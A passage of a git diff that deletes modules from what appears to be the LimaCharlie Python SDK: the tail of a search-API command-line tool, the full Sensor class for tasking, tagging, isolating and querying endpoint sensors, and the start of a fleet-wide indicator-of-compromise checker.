-        poll_count (int): Number of poll attempts.
-        page_count (int): Number of pages retrieved.
-        event_row_count (int): Number of event rows.
-        facet_count (int): Number of facets.
-        timeline_count (int): Number of timeline entries.
-        include_facets (bool): Whether facets were included.
-        include_timeline (bool): Whether timeline was included.
-
-    Return:
-        None
-    """
-    print("Search completed!", file=sys.stderr)
-    print("Statistics:", file=sys.stderr)
-    print("  - Total execution time: %.2f seconds" % (total_time,), file=sys.stderr)
-    print("  - Poll attempts: %d" % (poll_count,), file=sys.stderr)
-    print("  - Pages: %d" % (page_count,), file=sys.stderr)
-    print("  - Event rows: %d" % (event_row_count,), file=sys.stderr)
-    if include_facets and facet_count > 0:
-        print("  - Facets: %d" % (facet_count,), file=sys.stderr)
-    if include_timeline and timeline_count > 0:
-        print("  - Timeline entries: %d" % (timeline_count,), file=sys.stderr)
-
-
-def print_billing_stats(billing_stats):
-    """
-    Print billing statistics to stderr.
-
-    Parameters:
-        billing_stats (dict): Billing statistics from search results.
-
-    Return:
-        None
-    """
-    if not billing_stats:
-        return
-
-    print("Billing:", file=sys.stderr)
-
-    if 'bytesScanned' in billing_stats:
-        bytes_scanned = billing_stats['bytesScanned']
-        # Convert to human-readable format
-        if bytes_scanned >= 1024**3:
-            print("  - Bytes scanned: %.2f GB" % (bytes_scanned / (1024**3),), file=sys.stderr)
-        elif bytes_scanned >= 1024**2:
-            print("  - Bytes scanned: %.2f MB" % (bytes_scanned / (1024**2),), file=sys.stderr)
-        else:
-            print("  - Bytes scanned: %d bytes" % (bytes_scanned,), file=sys.stderr)
-
-    if 'eventsScanned' in billing_stats:
-        print("  - Events scanned: %d" % (billing_stats['eventsScanned'],), file=sys.stderr)
-
-    if 'eventsMatched' in billing_stats:
-        print("  - Events matched: %d" % (billing_stats['eventsMatched'],), file=sys.stderr)
-
-    if 'eventsProcessed' in billing_stats:
-        print("  - Events processed: %d" % (billing_stats['eventsProcessed'],), file=sys.stderr)
-
-    if 'estimatedPrice' in billing_stats:
-        price = billing_stats['estimatedPrice']
-        if isinstance(price, dict):
-            value = price.get('value', 0)
-            currency = price.get('currency', 'USD')
-            print("  - Estimated price: %.4f %s" % (value, currency), file=sys.stderr)
-        else:
-            print("  - Estimated price: %.4f USD" % (price,), file=sys.stderr)
-
-
-def main( sourceArgs = None ):
-    """
-    Command line interface for the LimaCharlie Search API.
-
-    Parameters:
-        sourceArgs (list): optional list of CLI arguments to parse.
-
-    Return:
-        None
-    """
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie search-api' )
-
-    # Create subparsers for different commands
-    subparsers = parser.add_subparsers( dest = 'command', help = 'search-api commands' )
-    subparsers.required = True
-
-    # Validate command
-    validate_parser = subparsers.add_parser( 'validate', help = 'validate a search query and get estimated pricing' )
-    validate_parser.add_argument( '-q', '--query',
-                                  type = str,
-                                  required = True,
-                                  dest = 'query',
-                                  help = 'the search query to validate.' )
-    validate_parser.add_argument( '-s', '--start',
-                                  type = str,
-                                  required = True,
-                                  dest = 'start',
-                                  help = 'start time - supports: "now-10m", "now-1h", "2025-12-30 10:00:00", Unix timestamp (seconds/ms).' )
-    validate_parser.add_argument( '-e', '--end',
-                                  type = str,
-                                  required = True,
-                                  dest = 'end',
-                                  help = 'end time - supports: "now", "now-1h", "2025-12-30 10:00:00", Unix timestamp (seconds/ms).' )
-    validate_parser.add_argument( '--stream',
-                                  type = str,
-                                  required = False,
-                                  dest = 'stream',
-                                  default = None,
-                                  help = 'optional stream name (e.g., "event", "detect", "audit").' )
-
-    # Execute command
-    execute_parser = subparsers.add_parser( 'execute', help = 'execute a search query with automatic pagination' )
-    execute_parser.add_argument( '-q', '--query',
-                                 type = str,
-                                 required = True,
-                                 dest = 'query',
-                                 help = 'the search query to execute.' )
-    execute_parser.add_argument( '-s', '--start',
-                                 type = str,
-                                 required = True,
-                                 dest = 'start',
-                                 help = 'start time - supports: "now-10m", "now-1h", "2025-12-30 10:00:00", Unix timestamp (seconds/ms).' )
-    execute_parser.add_argument( '-e', '--end',
-                                 type = str,
-                                 required = True,
-                                 dest = 'end',
-                                 help = 'end time - supports: "now", "now-1h", "2025-12-30 10:00:00", Unix timestamp (seconds/ms).' )
-    execute_parser.add_argument( '--stream',
-                                 type = str,
-                                 required = False,
-                                 dest = 'stream',
-                                 default = None,
-                                 help = 'optional stream name (e.g., "event", "detect", "audit").' )
-    execute_parser.add_argument( '--max-poll-attempts',
-                                 type = int,
-                                 required = False,
-                                 dest = 'max_poll_attempts',
-                                 default = 300,
-                                 help = 'maximum number of polling attempts per page (default: 300).' )
-    execute_parser.add_argument( '--poll-interval',
-                                 type = int,
-                                 required = False,
-                                 dest = 'poll_interval',
-                                 default = 2,
-                                 help = 'seconds to wait between poll attempts (default: 2).' )
-    execute_parser.add_argument( '--pretty',
-                                 action = 'store_true',
-                                 default = False,
-                                 required = False,
-                                 dest = 'pretty',
-                                 help = 'output pretty-printed JSON (default: compact JSON, one result per line).' )
-    execute_parser.add_argument( '--output-file',
-                                 type = str,
-                                 required = False,
-                                 dest = 'output_file',
-                                 default = None,
-                                 help = 'optional file path to write results to (default: stdout).' )
-    execute_parser.add_argument( '--output-format',
-                                 type = str,
-                                 required = False,
-                                 dest = 'output_format',
-                                 choices = ['jsonl', 'csv'],
-                                 default = None,
-                                 help = 'output format: jsonl or csv (default: auto-detect from file extension, or jsonl for stdout).' )
-    execute_parser.add_argument( '--non-interactive',
-                                 action = 'store_true',
-                                 default = False,
-                                 required = False,
-                                 dest = 'non_interactive',
-                                 help = 'disable progress indicators (useful for scripts and automation).' )
-    execute_parser.add_argument( '--include-facets',
-                                 action = 'store_true',
-                                 default = False,
-                                 required = False,
-                                 dest = 'include_facets',
-                                 help = 'include facets results (type: facets) in output (default: only events).' )
-    execute_parser.add_argument( '--include-timeline',
-                                 action = 'store_true',
-                                 default = False,
-                                 required = False,
-                                 dest = 'include_timeline',
-                                 help = 'include timeline results (type: timeline) in output (default: only events).' )
-
-    args = parser.parse_args( sourceArgs )
-
-    # Create manager instance
-    manager = Manager()
-
-    # Execute the requested command
-    if args.command == 'validate':
-        # Parse time inputs
-        try:
-            start_ts = parse_time_input( args.start )
-            end_ts = parse_time_input( args.end )
-
-            # Print parsed time range for user confirmation
-            print( "Time range: %s to %s" % ( format_timestamp( start_ts ), format_timestamp( end_ts ) ), file = sys.stderr )
-
-        except ValueError as e:
-            print( "Error parsing time: %s" % ( e, ), file = sys.stderr )
-            sys.exit( 1 )
-
-        # Validate the search query
-        result = manager.validateSearch(
-            args.query,
-            start_ts,
-            end_ts,
-            stream = args.stream
-        )
-
-        # Print validation results
-        print( json.dumps( result, indent = 2 ) )
-
-        # Check for validation error
-        if result.get( 'error', None ):
-            print( "Validation failed: %s" % ( result['error'], ), file = sys.stderr )
-            sys.exit( 1 )
-
-        # Print estimated price if available
-        estimated_price = result.get( 'estimatedPrice', {} )
-        if estimated_price:
-            price_value = estimated_price.get( 'value', 0 )
-            currency = estimated_price.get( 'currency', 'USD' )
-            print( "Estimated price: %.4f %s" % ( price_value, currency ), file = sys.stderr )
-
-    elif args.command == 'execute':
-        # Parse time inputs
-        try:
-            start_ts = parse_time_input( args.start )
-            end_ts = parse_time_input( args.end )
-        except ValueError as e:
-            print( "Error parsing time: %s" % ( e, ), file = sys.stderr )
-            sys.exit( 1 )
-
-        # Determine output format
-        output_format = args.output_format
-        if output_format is None and args.output_file:
-            # Auto-detect from file extension
-            _, ext = os.path.splitext( args.output_file )
-            if ext.lower() == '.csv':
-                output_format = 'csv'
-            else:
-                output_format = 'jsonl'
-        elif output_format is None:
-            # Default to jsonl for stdout
-            output_format = 'jsonl'
-
-        # Open output file if specified
-        output_file = None
-        csv_writer = None
-        csv_rows_buffer = []  # Buffer for CSV rows (to collect all field names first)
-        if args.output_file:
-            if output_format == 'csv':
-                output_file = open( args.output_file, 'w', newline='', encoding='utf-8' )
-            else:
-                output_file = open( args.output_file, 'w' )
-
-        try:
-            # Set up signal handler for Ctrl+C
-            _search_state.manager = manager
-            signal.signal( signal.SIGINT, _signal_handler )
-
-            # Print query info to stderr so results go to stdout
-            if not args.non_interactive:
-                print( "Executing search query...", file = sys.stderr )
-                print( "Query: %s" % ( args.query, ), file = sys.stderr )
-                print( "Time range: %s (%s) to %s (%s)" % (
-                    format_timestamp( start_ts ),
-                    args.start,
-                    format_timestamp( end_ts ),
-                    args.end
-                ), file = sys.stderr )
-                if args.stream:
-                    print( "Stream: %s" % ( args.stream, ), file = sys.stderr )
-                print( "", file = sys.stderr )
-
-            # Track execution time
-            exec_start_time = time.time()
-
-            # Callback for when query is initiated
-            def on_query_initiated(query_id):
-                _search_state.query_id = query_id
-
-            # Progress tracking
-            poll_count = [0]  # Use list to allow modification in nested function
-            time_range_seconds = end_ts - start_ts
-
-            # Progress callback with progress bar
-            def progress_callback():
-                if _search_state.interrupted:
-                    return
-                poll_count[0] += 1
-                if not args.non_interactive:
-                    elapsed = time.time() - exec_start_time
-
-                    elapsed_str = format_duration(elapsed)
-                    range_str = format_time_range(time_range_seconds)
-
-                    # Progress bar showing elapsed time processing the time range
-                    # Since we don't know actual progress, just show activity
-                    bar_width = 20
-                    # Animate the bar based on poll count
-                    pos = poll_count[0] % (bar_width + 1)
-                    if pos < bar_width:
-                        bar = ' ' * pos + '>' + '=' * (bar_width - pos - 1)
-                    else:
-                        bar = '=' * bar_width
-
-                    print( "\r[%s] Elapsed: %s | Range: %s | Polls: %d" % ( bar, elapsed_str, range_str, poll_count[0] ), end = '', file = sys.stderr, flush = True )
-
-            # Execute the search with automatic pagination
-            page_count = 0
-            last_page_number = 0
-            event_row_count = 0
-            facet_count = 0
-            timeline_count = 0
-            billing_stats = {}  # Track latest billing stats
-
-            # Section labels for separators
-            section_labels = {
-                'timeline': 'TIMELINE',
-                'facets': 'FACETS',
-                'events': 'EVENTS'
-            }
-
-            for result in manager.executeSearch(
-                args.query,
-                start_ts,
-                end_ts,
-                stream = args.stream,
-                max_poll_attempts = args.max_poll_attempts,
-                poll_interval = args.poll_interval,
-                progress_callback = progress_callback,
-                on_query_initiated = on_query_initiated
-            ):
-                # Check for interruption
-                if _search_state.interrupted:
-                    break
-
-                # Track page count using metadata
-                current_page = result.get( '_page_number', 1 )
-                if current_page > last_page_number:
-                    page_count = current_page
-                    last_page_number = current_page
-
-                # Check if this is first of type in page (for section separator)
-                is_first_of_type = result.get( '_first_of_type_in_page', False )
-                result_type = result.get( 'type', None )
-
-                # Update billing stats (keep latest from each page)
-                page_billing_stats = result.get( '_billing_stats', {} )
-                if page_billing_stats:
-                    billing_stats = page_billing_stats
-
-                # Extract the appropriate data based on type (for counting)
-                if result_type == 'events':
-                    rows = result.get( 'rows', [] )
-                elif result_type == 'facets':
-                    rows = result.get( 'facets', [] )
-                elif result_type == 'timeline':
-                    rows = result.get( 'timeseries', [] )
-                else:
-                    rows = []
-
-                # Count by type (always count, even if not outputting)
-                for row in rows:
-                    if result_type == 'events':
-                        event_row_count += 1
-                    elif result_type == 'facets':
-                        facet_count += 1
-                    elif result_type == 'timeline':
-                        timeline_count += 1
-
-                # Determine if we should output this result type
-                # When writing to file: only write events (machine-parsable data)
-                # When writing to stdout: write facets/timeline/events based on flags
-                should_output_for_file = ( result_type == 'events' )
-                should_output_for_stdout = False
-                if result_type == 'events':
-                    should_output_for_stdout = True
-                elif result_type == 'facets' and args.include_facets:
-                    should_output_for_stdout = True
-                elif result_type == 'timeline' and args.include_timeline:
-                    should_output_for_stdout = True
-
-                # Decide if we should output based on destination
-                should_output = should_output_for_file if output_file else should_output_for_stdout
-
-                if should_output:
-                    # Print section separator (only to stdout, not to files)
-                    if is_first_of_type and output_format != 'csv' and not output_file:
-                        section_label = section_labels.get( result_type, result_type.upper() )
-                        separator_line = '\r\n--- %s ---' % ( section_label, )  # \r\n to clear progress bar
-                        print( separator_line, flush = True )
-
-                    # Output each row
-                    for row in rows:
-                        if output_format == 'csv':
-                            # Flatten the row for CSV
-                            flat_row = flatten_dict( row )
-
-                            # Buffer CSV rows to collect all field names first
-                            if output_file:
-                                csv_rows_buffer.append( flat_row )
-                            else:
-                                # For stdout, we can't buffer - use dynamic field handling
-                                if csv_writer is None:
-                                    fieldnames = flat_row.keys()
-                                    csv_writer = csv.DictWriter( sys.stdout, fieldnames = fieldnames, extrasaction = 'ignore' )
-                                    csv_writer.writeheader()
-                                csv_writer.writerow( flat_row )
-                        else:
-                            # Output each row as JSON (JSONL format)
-                            if args.pretty:
-                                row_json = json.dumps( row, indent = 2 )
-                            else:
-                                row_json = json.dumps( row )
-
-                            if output_file:
-                                output_file.write( row_json + '\n' )
-                                output_file.flush()
-                            else:
-                                print( row_json, flush = True )
-
-            # Write buffered CSV rows if any
-            if output_format == 'csv' and output_file and len( csv_rows_buffer ) > 0:
-                # Collect all unique field names from all rows
-                all_fieldnames = set()
-                for row in csv_rows_buffer:
-                    all_fieldnames.update( row.keys() )
-
-                # Sort field names for consistent column ordering
-                all_fieldnames = sorted( all_fieldnames )
-
-                # Write CSV with all field names
-                csv_writer = csv.DictWriter( output_file, fieldnames = all_fieldnames, extrasaction = 'ignore' )
-                csv_writer.writeheader()
-                for row in csv_rows_buffer:
-                    csv_writer.writerow( row )
-
-            # Calculate execution time
-            exec_end_time = time.time()
-            total_time = exec_end_time - exec_start_time
-
-            # Print summary to stderr
-            if not args.non_interactive:
-                print( "\r" + " " * 80 + "\r", end = '', file = sys.stderr )  # Clear progress bar
-                print_statistics(total_time, poll_count[0], page_count, event_row_count, facet_count, timeline_count, args.include_facets, args.include_timeline)
-                print_billing_stats(billing_stats)
-
-        finally:
-            # Clear global state
-            _search_state.query_id = None
-            _search_state.manager = None
-
-            # Close output file if it was opened
-            if output_file:
-                output_file.close()
-                if not args.non_interactive:
-                    print( "Results written to: %s" % ( args.output_file, ), file = sys.stderr )
-
-    else:
-        parser.print_help()
-        sys.exit( 1 )
diff --git a/limacharlie/Sensor.py b/limacharlie/Sensor.py
deleted file mode 100644
index c9c95b73..00000000
--- a/limacharlie/Sensor.py
+++ /dev/null
@@ -1,539 +0,0 @@
-import uuid
-import time
-import json
-
-from .utils import LcApiException
-from .utils import GET
-from .utils import DELETE
-from .utils import POST
-from .utils import FutureResults
-from .utils import enhanceEvent
-
-class Sensor( object ):
-    '''Representation of a limacharlie.io Sensor.'''
-
-    _PLATFORM_WINDOWS = 0x10000000
-    _PLATFORM_LINUX = 0x20000000
-    _PLATFORM_MACOS = 0x30000000
-    _PLATFORM_IOS = 0x40000000
-    _PLATFORM_ANDROID = 0x50000000
-    _PLATFORM_CHROMEOS = 0x60000000
-
-    _ARCHITECTURE_X86 = 0x00000001
-    _ARCHITECTURE_X64 = 0x00000002
-    _ARCHITECTURE_ARM = 0x00000003
-    _ARCHITECTURE_ARM64 = 0x00000004
-    _ARCHITECTURE_ALPINE64 = 0x00000005
-    _ARCHITECTURE_CHROME = 0x00000006
-
-    def __init__( self, manager, sid, detailedInfo = None ):
-        try:
-            uuid.UUID( sid )
-        except:
-            raise LcApiException( 'Invalid sid, should be in UUID format.' )
-        self._manager = manager
-        self.sid = str( sid )
-        self._invId = None
-        self.responses = None
-        self._platform = None
-        self._architecture = None
-        self._hostname = None
-        self._detailedInfo = detailedInfo
-
-    def setInvId( self, inv_id ):
-        '''Set an investigation ID to be applied to all actions done using the object.
-
-        Args:
-            inv_id (str): investigation ID to propagate.
-        '''
-
-        self._invId = inv_id
-
-    def waitToComeOnline( self, timeout ):
-        '''Wait for the sensor to be online.
-
-        Args:
-            timeout (int): number of seconds to wait up to
-
-        Returns:
-            True if sensor is back or False if timeout
-        '''
-        deadline = time.time() + timeout
-
-        while not self.isOnline():
-            if time.time() >= deadline:
-                return False
-            time.sleep( min( 60, deadline - time.time() ) )
-
-        return True
-
-    def task( self, tasks, inv_id = None ):
-        '''Send a task (or list of tasks) to the Sensor.
-
-        Args:
-            tasks (str or list of str): tasks to send in the command line format described in official documentation.
-            inv_id (str): investigation ID to propagate.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        if not isinstance( tasks, ( tuple, list ) ):
-            tasks = [ tasks ]
-        req = { 'tasks' : tasks }
-        invId = None
-        if inv_id is not None:
-            invId = inv_id
-        elif self._invId is not None:
-            invId = self._invId
-        if invId is not None:
-            req[ 'investigation_id' ] = invId
-        return self._manager._apiCall( '%s' % self.sid, POST, req )
-
-    def request( self, tasks ):
-        '''Send a task (or list of tasks) to the Sensor and returns a FutureResults where the results will be sent; requires Manager is_interactive.
-
-        Args:
-            tasks (str or list of str): tasks to send in the command line format described in official documentation.
-
-        Returns:
-            a FutureResults object.
-        '''
-        if ( not self._manager._is_interactive ) or ( self._manager._spout is None ):
-            raise LcApiException( 'Manager provided was not created with is_interactive set to True, cannot track responses.' )
-        thisTrackingId = '%s/%s' % ( self._manager._inv_id, str( uuid.uuid4() ) )
-        future = FutureResults()
-
-        self._manager._spout.registerFutureResults( thisTrackingId, future )
-
-        self.task( tasks, inv_id = thisTrackingId )
-
-        return future
-
-    def simpleRequest( self, tasks, timeout = 30, until_completion = False ):
-        '''Make a request to the sensor assuming a single response.
-
-        Args:
-            tasks (str or list of str): tasks to send in the command line format described in official documentation.
-            timeout (int): number of seconds to wait for responses.
-            until_completion (bool or callback): if True, wait for completion receipts from the sensor, or callback for each response.
-
-        Returns:
-            a single event (if tasks was a single task), a list of events (if tasks was a list), or None if not received.
-        '''
-        future = self.request( tasks )
-
-        nExpectedResponses = 1
-        if isinstance( tasks, ( list, tuple ) ):
-            nExpectedResponses = len( tasks )
-
-        deadline = time.time() + timeout
-
-        # Although getting the command result may take a while, the receipt from the sensor
-        # should come back quickly so we will implement a static wait for that.
-        while True:
-            time.sleep( 1 )
-            if future.wasReceived:
-                break
-            if time.time() > deadline:
-                print("DEADLINE")
-                return None
-
-        # We know the sensor got the tasking, now we will wait according to variable timeout.
-        allResponses = []
-        nDone = 0
-        while True:
-            responses = future.getNewResponses( timeout = deadline - time.time() )
-            if not responses:
-                break
-            if not until_completion:
-                if 1 == nExpectedResponses:
-                    return responses[ 0 ]
-                else:
-                    allResponses += responses
-                    if len( allResponses ) >= nExpectedResponses:
-                        return allResponses
-            else:
-                for response in responses:
-                    err = response[ 'event' ].get( 'ERROR_MESSAGE', None )
-                    if err == 'done':
-                        nDone += 1
-                    else:
-                        if callable( until_completion ):
-                            response = until_completion( response )
-                        allResponses.append( response )
-                if nDone >= nExpectedResponses:
-                    return allResponses
-        return None
-
-    def tag( self, tag, ttl=None ):
-        '''Apply a Tag to the Sensor.
-
-        Args:
-            tag (str or list of str): Tag(s) to apply.
-            ttl (int): number of seconds the Tag should remain applied.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-        if ttl is not None:
-            req = { 'tags' : tag, 'ttl' : int( ttl ) }
-        else:
-            req = { 'tags' : tag }
-        return self._manager._apiCall( '%s/tags' % self.sid, POST, req )
-
-    def untag( self, tag ):
-        '''Remove a Tag from the Sensor.
-
-        Args:
-            tag (str): Tag to remove.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        if isinstance( tag, str ):
-            req = { 'tag' : tag }
-        else:
-            req = { 'tags' : ','.join( tag ) }
-        return self._manager._apiCall( '%s/tags' % self.sid, DELETE, req )
-
-    def getTags( self ):
-        '''Get Tags applied to the Sensor.
-
-        Returns:
-            the list of Tags currently applied.
-        '''
-
-        data = self._manager._apiCall( '%s/tags' % self.sid, GET )
-        return data[ 'tags' ][ self.sid ].keys()
-
-    def getInfo( self ):
-        '''Get basic information on the Sensor.
-
-        Returns:
-            high level information on the Sensor.
-        '''
-        data = self._detailedInfo
-        if not data:
-            data = self._manager._apiCall( '%s' % self.sid, GET )[ 'info' ]
-
-        # We massage the info a bit to make it easier to understand.
-        platToString = {
-            self._PLATFORM_WINDOWS : 'windows',
-            self._PLATFORM_LINUX : 'linux',
-            self._PLATFORM_MACOS : 'macos',
-            self._PLATFORM_IOS : 'ios',
-            self._PLATFORM_ANDROID : 'android',
-            self._PLATFORM_CHROMEOS : 'chromeos',
-        }
-        archToString = {
-            self._ARCHITECTURE_X86 : 'x86',
-            self._ARCHITECTURE_X64 : 'x64',
-            self._ARCHITECTURE_ARM : 'arm',
-            self._ARCHITECTURE_ARM64 : 'arm64',
-            self._ARCHITECTURE_ALPINE64 : 'alpine64',
-            self._ARCHITECTURE_CHROME : 'chrome',
-        }
-
-        self._platform = data[ 'plat' ]
-        self._architecture = data[ 'arch' ]
-        self._hostname = data.get( 'hostname', None )
-        self._is_isolated = data.get( 'is_isolated', None )
-        self._should_isolate = data.get( 'should_isolate', None )
-        self._is_sealed = data.get( 'is_sealed', None )
-        self._should_seal = data.get( 'should_seal', None )
-
-        data[ 'plat' ] = platToString.get( data[ 'plat' ], data[ 'plat' ] )
-        data[ 'arch' ] = archToString.get( data[ 'arch' ], data[ 'arch' ] )
-
-        return data
-
-    def isOnline( self ):
-        '''Checks if the sensor is currently online.
-
-        Returns:
-            True if the sensor is connected to the cloud right now.
-        '''
-        data = self._manager._apiCall( '%s' % self.sid, GET )
-
-        data = data[ 'online' ]
-        return ( len( data ) > 0 ) and ( 'error' not in data )
-
-    def isWindows( self ):
-        '''Checks if the sensor is a Windows OS.
-
-        Returns:
-            True if the sensor is Windows.
-        '''
-        if self._platform is None:
-            # If the platform has not been cached yet, retrieve the info.
-            self.getInfo()
-        return self._platform == self._PLATFORM_WINDOWS
-
-    def isMac( self ):
-        '''Checks if the sensor is a Mac OS.
-
-        Returns:
-            True if the sensor is Mac.
-        '''
-        if self._platform is None:
-            # If the platform has not been cached yet, retrieve the info.
-            self.getInfo()
-        return self._platform == self._PLATFORM_MACOS
-
-    def isLinux( self ):
-        '''Checks if the sensor is a Linux OS.
-
-        Returns:
-            True if the sensor is Linux.
-        '''
-        if self._platform is None:
-            # If the platform has not been cached yet, retrieve the info.
-            self.getInfo()
-        return self._platform == self._PLATFORM_LINUX
-
-    def isChrome( self ):
-        '''Checks if the sensor is on Chrome.
-
-        Returns:
-            True if the sensor is Chrome.
-        '''
-        if self._architecture is None:
-            # If the platform has not been cached yet, retrieve the info.
-            self.getInfo()
-        return self._architecture == self._ARCHITECTURE_CHROME
-
-    def isChromeOS( self ):
-        '''Checks if the sensor is on ChromeOS.
-
-        Returns:
-            True if the sensor is on ChromeOS.
-        '''
-        if self._architecture is None:
-            # If the platform has not been cached yet, retrieve the info.
-            self.getInfo()
-        return self._platform == self._PLATFORM_CHROMEOS
-
-    def hostname( self ):
-        '''Get the hostname of this sensor.
-
-        Returns:
-            a string of the hostname.
-        '''
-        if self._hostname is None:
-            # If the hostname has not been cached yet, retrieve the info.
-            self.getInfo()
-        return self._hostname
-
-    def getHistoricEvents( self, start, end, limit = None, eventType = None, isForward = True, outputName = None ):
-        '''Get the events for this sensor between the two times, requires Insight (retention) enabled.
-
-        Args:
-            start (int): start unix (seconds) timestamp to fetch events from.
-            end (int): end unix (seconds) timestamp to feth events to.
-            limit (int): maximum number of events to return.
-            eventType (str): return events only of this type.
-            isForward (bool): return events in ascending order.
-            outputName (str): send data to a named output instead.
-
-        Returns:
-            a generator of events.
-        '''
-        cursor = '-'
-        start = int( start )
-        end = int( end )
-        if limit is not None:
-            limit = int( limit )
-
-        req = {
-            'start' : start,
-            'end' : end,
-            'is_compressed' : 'true',
-            'is_forward' : 'true' if isForward else 'false',
-        }
-
-        if limit is not None:
-            req[ 'limit' ] = limit
-
-        if eventType is not None:
-            req[ 'event_type' ] = eventType
-        if outputName is not None:
-            req[ 'output_name' ] = outputName
-            yield self._manager._apiCall( 'insight/%s/%s' % ( self._manager._oid, self.sid ), GET, queryParams = req )
-            return
-
-        nReturned = 0
-        while cursor:
-            req[ 'cursor' ] = cursor
-            data = self._manager._apiCall( 'insight/%s/%s' % ( self._manager._oid, self.sid ), GET, queryParams = req )
-            cursor = data.get( 'next_cursor', None )
-            for event in self._manager._unwrap( data[ 'events' ] ):
-                yield enhanceEvent( event )
-                nReturned += 1
-                if limit is not None and limit <= nReturned:
-                    break
-            if limit is not None and limit <= nReturned:
-                break
-
-    def getHistoricOverview( self, start, end ):
-        '''Get a list of timestamps representing where sensor data is available in Insight (retention).
-
-        Args:
-            start (int): start unix (seconds) timestamp to look for events from.
-            end (int): end unix (seconds) timestamp to look for events to.
-
-        Returns:
-            a list of timestamps.
-        '''
-        start = int( start )
-        end = int( end )
-
-        req = {
-            'start' : start,
-            'end' : end,
-        }
-
-        data = self._manager._apiCall( 'insight/%s/%s/overview' % ( self._manager._oid, self.sid ), GET, queryParams = req )
-        return data[ 'overview' ]
-
-    def isDataAvailableFor( self, timestamp ):
-        '''Check if data is available in Insight for this sensor at this specific time.
-
-        Args:
-            timestamp (int): time (unix seconds epoch) to check for events.
-
-        Returns:
-            True if data is available.
-        '''
-        # The overview technically searches for batches of data coming in
-        # during that time frame, so we look for something shortly after.
-        batches = self.getHistoricOverview( timestamp, timestamp + ( 60 * 60 * 2 ) )
-        return 0 != len( batches )
-
-    def getObjectTimeline( self, start, end, bucketing = 'day', onlyTypes = None ):
-        '''Get summarized information about timeline of Objects (IOCs) for this host.
-
-        Args:
-            start (int): start time (unix seconds epoch) of the period to search.
-            end (int): end time (unix seconds epoch) of the period to search.
-            bucketing (str): granularity of the timeline, one of "hour", "day", "week", "month".
-            onlyTypes (list): list of object types to look for, all if undefined.
-
-        Returns:
-            Dict of timelines per type and object.
-        '''
-        req = {
-            'oid' : self._manager._oid,
-            'start' : start,
-            'end' : end,
-            'bucketing' : bucketing,
-            'sid' : self.sid,
-            'is_compressed' : True,
-            'objects' : json.dumps( { t : [] for t in onlyTypes } ) if onlyTypes is not None else "{}",
-        }
-
-        data = self._manager._apiCall( 'insight/%s/objects_timeline' % ( self._manager._oid, ), POST, req )
-        data = self._manager._unwrap( data[ 'timeline' ] )
-
-        # We don't care about the prevalence counters in this case
-        # so we'll just strip it down.
-        for oType, objects in data.items():
-            for o, timeInfo in objects.items():
-                objects[ o ] = sorted( tuple( timeInfo.keys() ) )
-
-        return data
-
-    def getChildrenEvents( self, atom ):
-        '''Get all children events from a given atom.
-
-        Args:
-            atom (string): atom to get the children of.
-
-        Returns:
-            List of events.
-        '''
-        req = {
-            'oid' : self._manager._oid,
-            'is_compressed' : True,
-        }
-
-        data = self._manager._apiCall( 'insight/%s/%s/%s/children' % ( self._manager._oid, self.sid, atom ), GET, queryParams = req )
-        data = self._manager._unwrap( data[ 'events' ] )
-
-        return data
-
-    def getEventByAtom( self, atom ):
-        '''Get an event by atom.
-
-        Args:
-            atom (string): atom to get the event of.
-
-        Returns:
-            Event.
-        '''
-        return self._manager._apiCall( 'insight/%s/%s/%s' % ( self._manager._oid, self.sid, atom ), GET )
-
-    def delete( self ):
-        '''Delete the sensor. It will not be able to connect to the cloud anymore, but will not be uninstalled.abs
-        '''
-
-        return self._manager._apiCall( '%s' % self.sid, DELETE, {} )
-
-    def isIsolatedFromNetwork( self ):
-        '''Determine if the given sensor is marked to be isolated from the network.
-
-        Returns:
-            True if isolated.
-        '''
-        # Network isolation is ephemeral, so always refresh.
-        self.getInfo()
-        return self._should_isolate
-
-    def isolateNetwork( self ):
-        '''Mark the sensor for network isolation (persistent).'''
-        return self._manager._apiCall( '%s/isolation' % ( self.sid, ), POST )
-
-    def rejoinNetwork( self ):
-        '''Remove the sensor from network isolation (persistent).'''
-        return self._manager._apiCall( '%s/isolation' % ( self.sid, ), DELETE )
-
-    def isSealed( self ):
-        '''Determine if the given sensor is marked to be sealed.
-
-        Returns:
-            True if sealed.
-        '''
-        # Seal is ephemeral, so always refresh.
-        self.getInfo()
-        return self._should_seal
-
-    def seal( self ):
-        '''Mark the sensor for sealing (persistent).'''
-        return self._manager._apiCall( '%s/seal' % ( self.sid, ), POST )
-
-    def unseal( self ):
-        '''Remove the sensor from sealing (persistent).'''
-        return self._manager._apiCall( '%s/seal' % ( self.sid, ), DELETE )
-
-    def getRetainedEventCount( self, startTime, endTime, isDetailed = False ):
-        '''Get the number of events retained for a given sensor between two second epochs.
-
-        Args:
-            startTime (int): time (unix seconds epoch) of the period start.
-            endTime (int): time (unix seconds epoch) of the period end.
-
-        Returns:
-            Event counts.
-        '''
-        return self._manager._apiCall( 'insight/event_count/%s/%s' % ( self._manager._oid, self.sid ), GET, queryParams = {
-            'start' : startTime,
-            'end' : endTime,
-            'is_detailed' : 'true' if isDetailed else 'false',
-        } )
-
-    def __str__( self ):
-        return self.sid
-
-    def __repr__( self ):
-        return self.sid
diff --git a/limacharlie/SpotCheck.py b/limacharlie/SpotCheck.py
deleted file mode 100644
index 0d32f70e..00000000
--- a/limacharlie/SpotCheck.py
+++ /dev/null
@@ -1,538 +0,0 @@
-from .Manager import Manager
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib2 import urlopen
-    from Queue import Queue
-else:
-    from urllib.request import urlopen
-    from queue import Queue
-
-import threading
-import time
-import uuid
-import traceback
-import json
-import base64
-import sys
-
-class SpotCheck( object ):
-    '''Representation of the process of looking for various Indicators of Compromise on the fleet.'''
-
-    def __init__( self, oid, secret_api_key, cb_check, cb_on_start_check = None, cb_on_check_done = None, cb_on_offline = None, cb_on_error = None, n_concurrent = 1, n_sec_between_online_checks = 60, extra_params = {}, is_windows = True, is_linux = True, is_macos = True, is_chrome = True, tags = None ):
-        '''Perform a check for specific characteristics on all hosts matching some parameters.
-
-        Args:
-            oid (uuid str): the Organization ID, if None, global credentials will be used.
-            secret_api_key (str): the secret API key, if None, global credentials will be used.
-            cb_check (func(Sensor)): callback function for every matching sensor, implements main check logic, returns True when check is finalized.
